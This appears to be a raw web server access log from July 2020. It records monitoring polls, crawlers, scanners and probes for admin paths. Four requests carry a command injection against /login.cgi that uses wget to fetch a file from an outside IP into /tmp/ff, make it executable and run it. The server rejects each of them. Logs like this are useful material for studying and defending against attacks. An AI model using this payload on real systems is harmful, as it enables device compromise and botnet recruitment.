129.144.224.27 - - [02/Jul/2020:14:54:31 +0200] "\x16\x03\x01" 501 318 "-" "-"
129.144.224.27 - - [02/Jul/2020:14:54:31 +0200] "\x16\x03\x01" 501 318 "-" "-"
129.144.224.27 - - [02/Jul/2020:14:54:31 +0200] "\x16\x03\x01" 501 318 "-" "-"
129.144.224.27 - - [02/Jul/2020:14:54:31 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [02/Jul/2020:14:54:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
103.196.36.41 - - [02/Jul/2020:14:55:07 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
212.91.246.72 - - [02/Jul/2020:14:55:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
193.34.173.203 - - [02/Jul/2020:14:56:11 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
36.234.68.173 - - [02/Jul/2020:14:56:19 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://45.95.168.126/d%20-O%20-%3E%20/tmp/ff;chmod%20+x%20/tmp/ff;sh%20/tmp/ff%27$ HTTP/1.1" 400 329 "-" "Rift/2.0"
45.201.130.88 - - [02/Jul/2020:14:56:20 +0200] "GET /admin/login.asp HTTP/1.1" 400 329 "-" "-"
212.91.246.72 - - [02/Jul/2020:14:56:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
220.132.106.146 - - [02/Jul/2020:14:56:35 +0200] "GET / HTTP/1.1" 400 329 "-" "-"
212.91.246.72 - - [02/Jul/2020:14:57:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
161.35.194.252 - - [02/Jul/2020:14:58:16 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
82.76.139.153 - - [02/Jul/2020:14:58:20 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
212.91.246.72 - - [02/Jul/2020:14:58:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
27.105.198.7 - - [02/Jul/2020:14:58:52 +0200] "GET / HTTP/1.1" 400 329 "-" "-"
96.127.169.2 - - [02/Jul/2020:14:59:03 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
122.116.230.15 - - [02/Jul/2020:14:59:09 +0200] "GET / HTTP/1.1" 400 329 "-" "-"
220.133.56.62 - - [02/Jul/2020:14:59:16 +0200] "GET / HTTP/1.1" 400 329 "-" "-"
212.91.246.72 - - [02/Jul/2020:14:59:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
192.241.226.197 - - [02/Jul/2020:14:59:47 +0200] "GET /portal/redlion HTTP/1.1" 404 319 "-" "Mozilla/5.0 zgrab/0.x"
45.123.110.148 - - [02/Jul/2020:15:00:02 +0200] "GET /admin/login.asp HTTP/1.1" 400 329 "-" "-"
212.91.246.72 - - [02/Jul/2020:15:00:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
117.200.84.34 - - [02/Jul/2020:15:00:45 +0200] "GET /admin/login.asp HTTP/1.1" 400 329 "-" "-"
212.91.246.72 - - [02/Jul/2020:15:01:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
192.241.226.197 - - [02/Jul/2020:15:01:37 +0200] "GET /portal/redlion HTTP/1.1" 404 319 "-" "Mozilla/5.0 zgrab/0.x"
192.241.226.197 - - [02/Jul/2020:15:01:38 +0200] "GET /portal/redlion HTTP/1.1" 404 319 "-" "Mozilla/5.0 zgrab/0.x"
192.241.226.197 - - [02/Jul/2020:15:02:00 +0200] "GET /portal/redlion HTTP/1.1" 404 319 "-" "Mozilla/5.0 zgrab/0.x"
192.241.226.197 - - [02/Jul/2020:15:02:06 +0200] "GET /portal/redlion HTTP/1.1" 404 319 "-" "Mozilla/5.0 zgrab/0.x"
212.91.246.72 - - [02/Jul/2020:15:02:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Jul/2020:15:03:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
192.241.226.197 - - [02/Jul/2020:15:04:00 +0200] "GET /portal/redlion HTTP/1.1" 404 319 "-" "Mozilla/5.0 zgrab/0.x"
192.241.226.197 - - [02/Jul/2020:15:04:01 +0200] "GET /portal/redlion HTTP/1.1" 404 319 "-" "Mozilla/5.0 zgrab/0.x"
192.241.226.197 - - [02/Jul/2020:15:04:09 +0200] "GET /portal/redlion HTTP/1.1" 404 319 "-" "Mozilla/5.0 zgrab/0.x"
212.91.246.72 - - [02/Jul/2020:15:04:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
124.106.113.152 - - [02/Jul/2020:15:05:30 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
212.91.246.72 - - [02/Jul/2020:15:05:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
222.252.43.45 - - [02/Jul/2020:15:06:02 +0200] "GET / HTTP/1.1" 400 329 "-" "-"
212.91.246.72 - - [02/Jul/2020:15:06:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Jul/2020:15:07:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Jul/2020:15:08:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Jul/2020:15:09:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
158.101.174.249 - - [02/Jul/2020:15:09:47 +0200] "\x16\x03\x01" 501 318 "-" "-"
158.101.174.249 - - [02/Jul/2020:15:09:47 +0200] "\x16\x03\x01" 501 318 "-" "-"
158.101.174.249 - - [02/Jul/2020:15:09:47 +0200] "\x16\x03\x01" 501 318 "-" "-"
158.101.174.249 - - [02/Jul/2020:15:09:47 +0200] "\x16\x03\x01" 501 318 "-" "-"
158.101.174.249 - - [02/Jul/2020:15:09:47 +0200] "\x16\x03\x01" 501 318 "-" "-"
158.101.174.249 - - [02/Jul/2020:15:09:47 +0200] "\x16\x03\x01" 501 318 "-" "-"
158.101.174.249 - - [02/Jul/2020:15:09:47 +0200] "\x16\x03\x01" 501 318 "-" "-"
158.101.174.249 - - [02/Jul/2020:15:09:47 +0200] "\x16\x03\x01" 501 318 "-" "-"
158.101.174.249 - - [02/Jul/2020:15:09:47 +0200] "\x16\x03\x01" 501 318 "-" "-"
158.101.174.249 - - [02/Jul/2020:15:09:47 +0200] "\x16\x03\x01" 501 318 "-" "-"
5.235.197.178 - - [02/Jul/2020:15:09:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
212.91.246.72 - - [02/Jul/2020:15:10:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Jul/2020:15:11:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
110.77.235.228 - - [02/Jul/2020:15:12:24 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
212.91.246.72 - - [02/Jul/2020:15:12:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Jul/2020:15:13:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Jul/2020:15:14:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
122.116.22.149 - - [02/Jul/2020:15:15:21 +0200] "GET / HTTP/1.1" 400 329 "-" "-"
212.91.246.72 - - [02/Jul/2020:15:15:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
59.126.7.130 - - [02/Jul/2020:15:15:40 +0200] "GET / HTTP/1.1" 400 329 "-" "-"
178.137.16.133 - - [02/Jul/2020:15:16:31 +0200] "GET / HTTP/1.1" 200 1229 "https://4ist.ru/" "Mozilla/4.7 (compatible; OffByOne; Windows 2000) Webster Pro V3.4"
178.137.16.133 - - [02/Jul/2020:15:16:31 +0200] "GET / HTTP/1.1" 200 1229 "https://4ist.ru/" "Mozilla/4.7 (compatible; OffByOne; Windows 2000) Webster Pro V3.4"
178.137.16.133 - - [02/Jul/2020:15:16:32 +0200] "GET / HTTP/1.1" 200 1229 "https://4ist.ru/" "Mozilla/4.7 (compatible; OffByOne; Windows 2000) Webster Pro V3.4"
212.91.246.72 - - [02/Jul/2020:15:16:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Jul/2020:15:17:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Jul/2020:15:18:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Jul/2020:15:19:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
104.248.33.135 - - [02/Jul/2020:15:19:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
212.91.246.72 - - [02/Jul/2020:15:20:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Jul/2020:15:21:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Jul/2020:15:22:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
66.249.70.91 - - [02/Jul/2020:15:22:58 +0200] "GET /robots.txt HTTP/1.1" 404 315 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.70.93 - - [02/Jul/2020:15:22:58 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.92 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
180.108.197.140 - - [02/Jul/2020:15:23:30 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
212.91.246.72 - - [02/Jul/2020:15:23:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
114.47.230.234 - - [02/Jul/2020:15:24:27 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://45.95.168.126/d%20-O%20-%3E%20/tmp/ff;chmod%20+x%20/tmp/ff;sh%20/tmp/ff%27$ HTTP/1.1" 400 329 "-" "Rift/2.0"
212.91.246.72 - - [02/Jul/2020:15:24:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Jul/2020:15:25:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Jul/2020:15:26:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Jul/2020:15:27:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Jul/2020:15:28:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
192.35.168.251 - - [02/Jul/2020:15:29:28 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
192.35.168.251 - - [02/Jul/2020:15:29:28 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
212.91.246.72 - - [02/Jul/2020:15:29:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Jul/2020:15:30:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Jul/2020:15:31:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Jul/2020:15:32:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Jul/2020:15:33:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
59.126.135.2 - - [02/Jul/2020:15:34:20 +0200] "GET / HTTP/1.1" 400 329 "-" "-"
212.91.246.72 - - [02/Jul/2020:15:34:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Jul/2020:15:35:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
104.248.33.135 - - [02/Jul/2020:15:36:08 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
212.91.246.72 - - [02/Jul/2020:15:36:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Jul/2020:15:37:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
177.11.136.16 - - [02/Jul/2020:15:37:38 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
212.91.246.72 - - [02/Jul/2020:15:38:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Jul/2020:15:39:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
103.196.36.41 - - [02/Jul/2020:15:39:38 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
59.126.234.131 - - [02/Jul/2020:15:40:18 +0200] "GET / HTTP/1.1" 400 329 "-" "-"
212.91.246.72 - - [02/Jul/2020:15:40:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Jul/2020:15:41:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
123.23.93.73 - - [02/Jul/2020:15:42:17 +0200] "GET / HTTP/1.1" 400 329 "-" "-"
212.91.246.72 - - [02/Jul/2020:15:42:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
114.27.83.10 - - [02/Jul/2020:15:42:55 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://45.95.168.126/d%20-O%20-%3E%20/tmp/ff;chmod%20+x%20/tmp/ff;sh%20/tmp/ff%27$ HTTP/1.1" 400 329 "-" "Rift/2.0"
122.116.0.80 - - [02/Jul/2020:15:43:29 +0200] "GET / HTTP/1.1" 400 329 "-" "-"
212.91.246.72 - - [02/Jul/2020:15:43:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Jul/2020:15:44:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
220.136.21.46 - - [02/Jul/2020:15:44:46 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://45.95.168.126/d%20-O%20-%3E%20/tmp/ff;chmod%20+x%20/tmp/ff;sh%20/tmp/ff%27$ HTTP/1.1" 400 329 "-" "Rift/2.0"
212.91.246.72 - - [02/Jul/2020:15:45:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
123.195.85.46 - - [02/Jul/2020:15:45:37 +0200] "GET / HTTP/1.1" 400 329 "-" "-"
212.91.246.72 - - [02/Jul/2020:15:46:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Jul/2020:15:47:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
114.35.157.118 - - [02/Jul/2020:15:48:07 +0200] "GET / HTTP/1.1" 400 329 "-" "-"
212.91.246.72 - - [02/Jul/2020:15:48:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
85.104.117.174 - - [02/Jul/2020:15:49:11 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
212.91.246.72 - - [02/Jul/2020:15:49:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Jul/2020:15:50:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Jul/2020:15:51:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
96.127.169.2 - - [02/Jul/2020:15:52:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
198.199.116.182 - - [02/Jul/2020:15:52:29 +0200] "GET /ReportServer HTTP/1.1" 404 317 "-" "Mozilla/5.0 zgrab/0.x"
212.91.246.72 - - [02/Jul/2020:15:52:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
198.199.116.182 - - [02/Jul/2020:15:53:06 +0200] "GET /ReportServer HTTP/1.1" 404 317 "-" "Mozilla/5.0 zgrab/0.x"
176.126.175.8 - - [02/Jul/2020:15:53:10 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
212.91.246.72 - - [02/Jul/2020:15:53:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Jul/2020:15:54:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
198.199.116.182 - - [02/Jul/2020:15:55:06 +0200] "GET /ReportServer HTTP/1.1" 404 317 "-" "Mozilla/5.0 zgrab/0.x"
212.91.246.72 - - [02/Jul/2020:15:55:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
176.126.175.8 - - [02/Jul/2020:15:55:59 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
190.98.231.3 - - [02/Jul/2020:15:56:33 +0200] "\x16\x03\x01" 501 318 "-" "-"
200.27.167.66 - - [02/Jul/2020:15:56:33 +0200] "\x16\x03\x01" 501 318 "-" "-"
190.98.231.3 - - [02/Jul/2020:15:56:33 +0200] "\x16\x03\x01" 501 318 "-" "-"
190.98.231.3 - - [02/Jul/2020:15:56:33 +0200] "\x16\x03\x01" 501 318 "-" "-"
190.216.150.163 - - [02/Jul/2020:15:56:33 +0200] "\x16\x03\x01" 501 318 "-" "-"
190.98.231.3 - - [02/Jul/2020:15:56:33 +0200] "\x16\x03\x01" 501 318 "-" "-"
190.98.231.3 - - [02/Jul/2020:15:56:33 +0200] "\x16\x03\x01" 501 318 "-" "-"
200.27.167.66 - - [02/Jul/2020:15:56:33 +0200] "\x16\x03\x01" 501 318 "-" "-"
190.98.231.3 - - [02/Jul/2020:15:56:33 +0200] "\x16\x03\x01" 501 318 "-" "-"
200.27.167.66 - - [02/Jul/2020:15:56:33 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [02/Jul/2020:15:56:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
198.199.116.182 - - [02/Jul/2020:15:57:19 +0200] "GET /ReportServer HTTP/1.1" 404 317 "-" "Mozilla/5.0 zgrab/0.x"
198.199.116.182 - - [02/Jul/2020:15:57:24 +0200] "GET /ReportServer HTTP/1.1" 404 317 "-" "Mozilla/5.0 zgrab/0.x"
212.91.246.72 - - [02/Jul/2020:15:57:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Jul/2020:15:58:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
198.199.116.182 - - [02/Jul/2020:15:58:35 +0200] "GET /ReportServer HTTP/1.1" 404 317 "-" "Mozilla/5.0 zgrab/0.x"
212.91.246.72 - - [02/Jul/2020:15:59:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Jul/2020:16:00:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Jul/2020:16:01:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
193.106.29.210 - - [02/Jul/2020:16:01:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0"
193.106.29.210 - - [02/Jul/2020:16:02:06 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0"
212.91.246.72 - - [02/Jul/2020:16:02:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
193.106.29.210 - - [02/Jul/2020:16:02:36 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0"
193.106.29.210 - - [02/Jul/2020:16:02:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0"
66.249.64.216 - - [02/Jul/2020:16:03:13 +0200] "GET /robots.txt HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.64.216 - - [02/Jul/2020:16:03:13 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
193.106.29.210 - - [02/Jul/2020:16:03:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0"
212.91.246.72 - - [02/Jul/2020:16:03:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
193.106.29.210 - - [02/Jul/2020:16:03:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0"
193.106.29.210 - - [02/Jul/2020:16:04:08 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0"
176.126.175.8 - - [02/Jul/2020:16:04:09 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
193.106.29.210 - - [02/Jul/2020:16:04:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0"
193.106.29.210 - - [02/Jul/2020:16:04:20 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0"
212.91.246.72 - - [02/Jul/2020:16:04:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
182.155.153.100 - - [02/Jul/2020:16:05:20 +0200] "GET / HTTP/1.1" 400 329 "-" "-"
212.91.246.72 - - [02/Jul/2020:16:05:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
193.106.29.210 - - [02/Jul/2020:16:06:20 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0"
212.91.246.72 - - [02/Jul/2020:16:06:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
122.117.76.3 - - [02/Jul/2020:16:06:45 +0200] "GET / HTTP/1.1" 400 329 "-" "-"
190.98.231.3 - - [02/Jul/2020:16:07:31 +0200] "\x16\x03\x01" 501 318 "-" "-"
190.98.231.3 - - [02/Jul/2020:16:07:31 +0200] "\x16\x03\x01" 501 318 "-" "-"
190.98.231.3 - - [02/Jul/2020:16:07:31 +0200] "\x16\x03\x01" 501 318 "-" "-"
200.27.167.66 - - [02/Jul/2020:16:07:31 +0200] "\x16\x03\x01" 501 318 "-" "-"
190.98.231.3 - - [02/Jul/2020:16:07:31 +0200] "\x16\x03\x01" 501 318 "-" "-"
190.98.231.3 - - [02/Jul/2020:16:07:31 +0200] "\x16\x03\x01" 501 318 "-" "-"
190.98.231.3 - - [02/Jul/2020:16:07:31 +0200] "\x16\x03\x01" 501 318 "-" "-"
190.98.231.3 - - [02/Jul/2020:16:07:31 +0200] "\x16\x03\x01" 501 318 "-" "-"
